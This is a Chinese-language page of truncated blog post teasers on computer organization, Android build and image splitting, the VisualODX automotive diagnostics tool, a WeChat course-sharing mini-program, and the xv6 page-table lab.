文章目录一、计算机系统简介1.计算机软硬件概念2.计算机系统的层次结构&#xff08;1&#xff09;现代计算机&#xff08;2&#xff09;发展&#xff08;3&#xff09;软硬件分布3.计算机组成和计算机体系结构二、计算机的基本组成1.冯诺依曼计算器2.计算机硬件框图3.计算机工作…

android架构拆分方案-编译相关方案与技术

接上文https://blog.csdn.net/dongyi1988/article/details/128617738直接拆分那么在代码和做包过程中&#xff0c;需要用到分仓&#xff0c;super.img、boot、OTA升级包的拆分与组合&#xff0c;vendor与system相关依赖处理&#xff0c;开机验证链还必须给镜像签名。代码管理定…

VisualODX——ODX数据自动转换工具

在创建ODX数据库的过程中&#xff0c;我们需要录入大量的数据以及应对多种数据格式。这不仅费时费力&#xff0c;而且还需要很高的人力成本&#xff0c;并且其错误率也高&#xff0c;从而导致了效率低下、开发速度缓慢。基于多年的汽车行业诊断经验&#xff0c;Softing开发了Vi…

基于微信小程序的课程分享平台小程序

文末联系获取源码 开发语言&#xff1a;Java 框架&#xff1a;ssm JDK版本&#xff1a;JDK1.8 服务器&#xff1a;tomcat7 数据库&#xff1a;mysql 5.7/8.0 数据库工具&#xff1a;Navicat11 开发软件&#xff1a;eclipse/myeclipse/idea Maven包&#xff1a;Maven3.3.9 浏览器…

xv6-lab3: page table

文章目录1.speed up system call2. print page3. Detecting which pages have been accessedwhere is page table?function of page table?how to get arguments from user to kernel? – reference:https://stackoverflow.com/questions/46870509/how-to-pass-a-value-into…